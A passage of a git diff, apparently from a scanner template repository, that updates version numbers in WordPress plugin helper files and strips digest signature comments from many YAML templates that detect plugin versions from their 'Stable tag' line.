a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.3.2 \ No newline at end of file +2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 575a07b9f9f..2ad1684ea1d 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.14.0 \ No newline at end of file +2.14.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index e2bdf6e45aa..74500cee168 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.7.3 \ No newline at end of file +2.7.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt index 8a8c005df7b..8c1da59dbb3 100644 --- a/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt +++ b/helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt @@ -1 +1 @@ -3.8.4 \ No newline at end of file +3.8.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index b8d12d73710..d5724cd41b6 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.6.1 \ No newline at end of file +2.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-crontrol.txt b/helpers/wordpress/plugins/wp-crontrol.txt index 092afa15df4..44c20126352 100644 --- a/helpers/wordpress/plugins/wp-crontrol.txt +++ b/helpers/wordpress/plugins/wp-crontrol.txt @@ -1 +1 @@ -1.17.0 +N/A \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 8d9ff9ec94b..94837c4cfb3 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.8.1 \ No newline at end of file +14.9 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 52a70bcd1f1..3fd2256749a 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c65b823d5ea99f97e8d18e798271d51bca4942510f098776ddcff1095fe1c23202203df76afb09f08b71d8337f4275bfbb3f707f23239683fd09af198548fd30b49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 414b8e1f463..6a0d344b632 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200da6585c66bc8846cd2f9ca26a91e682f5dcb45c5fd8b5d6482453765287a4fe022053773056083cc5deb2811182955c6db3db546c6a7013fa32395942582b868aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 3f9dd9c9f94..6fb5080bc80 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b40b3c8bc7f6e73664404bece294910391a69ea90c9bda651d4ea4b1a6d44679022037b7ac6f050c4a6c7140b2b8e523a264db8d0bd46d6fbd269f5b525165c95862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e0efdbf0496..cddbb4bb2ed 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b8e9474a66e9f53bb5f6511bbd2e0687db461ef22605c04c117b363823b97960221009b10b16219fe1ddca3d95535c1c5188f83491bbcfae9f61366c609dc6e09e4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 685bc73229f..6f253f9f556 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c283c006f56d4531a17d038ece215b7bcbba1e802da341fe156482f5aed4cc3022009aea70e7c847f937da37422e056b8f6d2d977dc93fa1cf598d4d00badde65c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 96ae6393d11..fe45de4d042 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088ff73665cfd4c14c4bc8a41145346ba08df6fe5ca5132668978c8369536dbc0022100ef8f41ff0b297cd5eab55929696199dd414507a1863fa0509dd350c70b227cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 23f5c0a784c..69e425f4469 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b65a492084c14ce7cb4558863c31965501d1f983924886b44df1e5c532aca090221009583ec10a3571aa6968cc28eb63206e0f29aa9f1ca2696c4af461ef67ae195c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index bce4c6c75a5..9c07c65e4e6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079ad81fd618dd66f86b18703cb2c9d6e660cea83aa210bd6405b5dee2af11df502202a3e08b399df2ab88c31014dc9eb114415f8783b9cc8a6d71d6e313bec5d0029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 2956599a361..92c8f5656e9 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f08486185fa1c664d9c3bd526c6a1134f25c0c690f7416d1d5f933ca9f9bedc02203469935a9fe2e20b0ccd414464ae42c606c0d0469c1000ae477b8ba37b50be39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e11435ddc2a..70975a19a1f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b62a173a79e9c39c665cbbfaa1c9cc5ce7203586bb9a7c74035eed740c4f420702206baafb39b911c2922bb1dfeb064e58a920973ead81221561619aab3f616238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 74d22f67e33..fd7e3e99dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079c392a31478d84f9b4bee3f964e4df5be78e88145c0178fe8dcc02ca2acebd0022039f528e9fc1e2dff2f32cc3e6249762429d5a84170628c3c21f7df335d989061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 7dd3eb88d51..18f2a2ae84c 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea65f24e64f20f1c706cef003345c9d44ac00e78f227a2a6a580173dd9e52647022100b1f27362e14c160715da13cc0cd2f8e0fa34ac6ed539be12848d67682a7ecf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 42ca1cca2d1..11cb41fb2ce 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203719158333e1637929e373339820d1b8b03e40fec6d5eff273863b2cc35ce6a80220443148b554681622699f05609be51fab0b06d4cfacc095fbc80d6e5fa41ffd52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 29ac03b9306..df3c5f3a944 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab24329151f03bdefc2ce80deb358f1305f08d8e999da427ecf3886b7e64153a02202d2f23e03e8c869d081097759bb4c69ef93e9ef5d1395c1a51305073b52c49eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index a9d979c0e5c..6a50e049dca 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da4fe179b9b4c7089b548fc06bbc015ce003b9d4b46ea1944bdb53897049fd7f0220059d856a2a8b31a5011801bc2c97901cb26bd2544285d3e60b58691523c7291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 192d4fd0a9b..e5326941673 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc56b4d399e4a59e72e8553e014da111a93fc345649f0a2ef06a7ad1708a27ea022100d02d6c0466801c9c541bf03278bf00d29672447626f861c9a84d7e8e90545dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 5fb7ea9a3ca..4c6e616c1d6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3a4711b824a1e1081d96ae167a1d55cb5a4256c641d3e112bc8694c76fd033602203ace72fd244107d02b17231f8192a9bcc37a63f07060f877481938340db0ac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index b277a430d37..a70a58690c3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b841d61d2f86424b38c7a93e21c0038922a8c77ca63ca1f69bfb467c38765237022025341015f037bb29f036d00069a17e41dca06455f252d30cfc07785e77128a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 1177d38a77e..4e3c68c53a3 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e735b105ed63ee23722e5a4f8d18dba49f00cd6c563ab73ef5db7df693f015902203d20d751a8d889ebc7a6c8b8b89bb850cb08d188dc967ce51a46270e3daf3f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index c122d1f0575..0cd866179ee 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8ec4a1f105712de7a2d8e9b5b3fe65f8946a6000626770d302d2b6f468a739302201a29d8088e8f333cbba876560db7f9079af738c529481cda13cbd8af2ddfee54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6d0df5aaabb..b1d8479d139 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee90998c47458e2709b8acb4054512f9a82383bcf4dad743f01b9c3124c4c87c02201142a47b00bcc7df0321ae026493787a5390e19112fc30af34cdb0a60ff7095c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index a20ff68328c..04e090313f6 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf5a03127cd3cc9563db65b0781e56931696dbd833caf2daab173172da9dd38a022100b6e0b9f929e4582b9c53f27d322c4e66ea96b29a341477c73fe9d768f6073a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 3759654c329..57e618924be 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b30dbdb69a0d3309dcceb706292aaca1f79ffc026931097293b3d2eb1bcaa6800220094f253b5bd2d73c7c93e85f16e4b6af3da84569af061356eb0d20244b77d80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 621761f13e6..571b3b20a39 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220550a62b664c80bb3a191c3f914f48b43fe2fa627b04e9473ce32769bc93a9961022100e6763e3797911f7b483cd6e8489b5ff7eadcd76c5b4483807d24a3d4fe72b60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 8ec465a529d..4d562316b4a 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e19ad19c1de0e35bb88ba8b38a1d34ca17100fd5106f7892840703f277d23ed022100edb4b95a7f2c68a5b2aa1e2df6df4e8597a751e95164ce6bdef1ffe1194c972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 9704d3bdc4f..dcea952545d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201435b6d9c4d926f108b8e4dc4030902de7bf7fd638dc817a0dc753c64d47696e02204e9ecb194d9d1014528aedda893f0dabc9ac80ef5cfc1543a8785a017d951e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 8fbf301aeea..0ae2f181225 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aac647d87b1dc22564132f538ae91918caf8d676cda7f94e6bd748714ce5fbe1022053cf242e74c1841ff2c0a355b86b165edb02464e1b66f6e57142e13c76a95674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index b40772c800a..12f549d5369 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e94e954f8ab15265bc272850ce5e21531c75b363d7917b1907188f085d6b378902210080b43ed897ac918703098dbadbe5526aa6af3d48b9eda3895c3a6a12e08d26b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 803c525878b..d8ea6a72f1d 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204784fb5600ffd663ad2bff0bd813dc0740f08f5f69b1a04ae7bf3bcf23d18fe4022015371936d5cdc2f5629d00ac27398fbaeed3bd3b3b614a07b8520cb9b7ccdb89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4cf1100abd6..4afaf9dc979 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220030b1605a2148bf426b45dda43711c1d41c948c0242cbd769f4d3d8a2434036102210095c2b2fdf8fd937bc89aafc185187fadbdb2bc6566c0bb6284b6ad55ecb999c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 038e6619daa..88fea67f934 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220649cc00b8752020c6ada49c61addff74a31d6d150cd86d66c090e89c1b6a816502206539c70f1f27639d3a93059b878eab9fb10d612e9fb3453f26c2ad52dcf64479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1a1ae3c440e..d205cdbf361 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb0914fd3e1eec1f734722906ae3b3c298b9da5abc08d98d1274fa9df4cf1e8802210080e5e8e03353803b0fcea7f986ba2caed1c3d2077fe2ad6aef85e0499d86bfeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 27f321fecf7..3fa20df7d26 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085fa5c61a020f03505e0a518b6b1bc2f05354dcb9685a0cf806c67c8291177820220790943a11d295a4af764d96d09a4603e8bf02a87c8756be5fad9783c9b577c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 62bbb0b883e..bcd63ced86e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8a908894c2494a6322820e9ac1d07883a0019d3df3e11f685b5cb06beacaeaf022100ad0d5adfe0b6dfac60a257749031bda3a46d98941449418173814d4ac20fb064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index e4b5536e84a..bca0326f2b6 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e077c85747996fcec2037f426938a40b82fbe10914df0184e5ca7e2736ef3f502207658548bfc080f39b2b770df08454856bb19c87591f0beb623aca9fdfd9ecb51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 065a95456e9..854328f04b0 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220724e7b4aee59c4ea617c59bc2fa442009cb1ef16527ac5e71fd224208092a280022061e345736f255b9a1cfd67087056155880e3648cd43f6bdeeb5185bcf930c764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6ffdcae5240..6d3f7f4566f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a48cd636d3048eab3157d063d4e35af4d1646a0c230f4f1cb040b1ca0943233022100f16243d95c799e0c8ebc6cbbcee5039316b1cddc152b060ff45bb5087f84fc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 91c580f389f..a923d21a154 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f926ca83c02a199013f4eeea6a7ea7f75f0b2578ea2becba0f87e6b1cf27a1b022100bed67dbd2468de67325cbd23b57be9de2c8eb97e19d1d4a4b41d52193858c118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 33b88b8b665..f10480fc8f2 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204f8fa4f6528634198fc92c04b0fa411c50e3ebe0269959caa8fa91ef750b1e99022062476d32dc5337a1e1f20a2443141b44370adb686e8650cc57f5c5777e54f062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index e68a4ff4f9b..6c920917673 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ffd38d548b60af8903f22f5cd8b6145133673c51e51ea0ba0a60e8fde33898a022032b92b60ffa578397b3d449f5959847f7a80b475f3258e760b445e69d97e3b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index ac6e4fa5000..b25c6c9a9ce 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f396796023ce2494b9212462490c32a4f05637c9e95b0d3f3784461a7a920cf4022012eea0f57c50533a7e25976c0bda1c2d58211766ed64478180c51fe7239b9d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index eaa6055705f..1781172d05e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206647404eed2a17708f789c643a269d9a972e8c3806e9ccd2e3972415b903d6bb02210096e8ed55043e9d0fe709895b301485a48359c769663a3e391f9a4478304556bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 9079d50df27..92c8ce34093 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f7d4586849b93fd153002dc2a3022ff105ab0948d0fbd467ddf633d93a5d33a022064b62e813fe732b75527a4b8e5773fb71a98ff91ee883b050daa092e3896fb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index e9dc6baad19..eea42ed8dad 100644 --- 